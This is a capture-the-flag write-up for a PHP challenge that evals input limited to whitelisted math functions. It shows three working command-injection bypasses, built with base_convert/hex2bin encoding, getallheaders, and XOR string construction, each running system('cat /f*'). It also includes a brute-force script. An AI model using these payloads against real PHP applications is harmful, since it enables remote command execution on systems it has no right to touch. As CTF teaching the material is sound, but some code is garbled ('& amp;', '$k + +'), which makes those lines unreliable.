Table of Contents
hex2bin bin2hex
base_convert
dynamic function
The first solution is to obtain parameters through get
bypass
The second solution is to read the request header
getallheaders
echo a,b
The third solution is XOR to get more characters
This question is also very interesting!
By specifying the whitelist and blacklist, the function is specified as a mathematical function, and the parameters can only be parameters specified in the whitelist.
We first need to understand that when executing commands through hexadecimal conversion, the first thing that comes to mind is hex2bin/bin2hex
hex2bin bin2hex
This function can convert hexadecimal to ASCII code to realize numbers to characters.
So we can pass here
Next we need to understand the base_convert() function
base_convert
This function can convert arbitrary bases to and from each other.
We give examples here
The hex2bin here is hexadecimal, so you can convert decimal to character form.
Dynamic function
The first solution is to obtain parameters through get
We cannot implement system(cat /flag) because hexadecimal does not accept special symbols such as spaces, so we cannot directly obtain the command.
But let’s think about it for a moment
$a($b) $a=system $b=cat /f* Finally, is it system(cat /f*)
Now the question is how do we receive the parameters
Here it is mainly through GET POST method
_GET[1](_GET[2]) 1=system 2=cat /f* Is it equivalent to system(cat /f*)
Now the question changes to how to pass characters
Because _GET[] is not in the whitelist and even [] is still in the blacklist
This involves bypassing
Bypass
First of all, [] can be bypassed by {}. It is very simple.
Secondly _GET we can encode it mathematically
The hex2bin we learned above can convert hexadecimal to ASCII
So we can construct _GET
First convert via bin2hex
Get hexadecimal
But there are characters in it
We found that the regular filter filtered letters, so we need to replace them with all numbers, which is decimal.
Then convert via dechex
The last one is hex2bin. We only need to convert its decimal to hexadecimal.
c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs}) & amp;pi=system & amp; abs=cat /*
Let me simplify it for you
c=$pi=hex2bin(5f474554) This is equivalent to c=$pi=_GET
($$pi){pi} here is equivalent to $_GET{pi}
(($$pi){abs}) here is equivalent to ($_GET{abs})
Combined $_GET{pi}($_GET{abs})
pi=system abs=cat /f*
It can be system(cat /f*)
The second solution is to read the request header
First of all, it is very complicated and troublesome to construct get. Can we execute the command directly?
Since we cannot read the content of get, then we directly accept the request header
There is a function here
getallheaders
getallheaders
Can accept request headers
We directly use exec(getallheaders) to execute this command
There is another knowledge point that needs to be understood here.
echo a,b
echo a,b ab will be output
So we can execute it directly through exec a,b
Convert through hexadecimal
c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
Then access it through 1:cat /f*
Here getallheaders requires base 30
Third solution XOR to get more characters
Can we get the flag directly?
We use XOR to get more strings
Let’s write php code
<?php
$pl=['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos ', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec ', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($pl);$k + + ){
for($i=0;$i < 9;$i + + ){
for($j=1;$j <= 9; $j + + ){
$exp=$pl[$k]^$i.$j;
echo($pl[$k]."^".$i.$j."===>".$exp);
echo " ";
}
}
}
?>
GET_GET
Just do the same as the first one
?c=$pi=(mt_srand^(2).(3)).(tanh^(1).(5));$$pi{1}($$pi{0}) & amp; 1=system & amp;0=cat /f*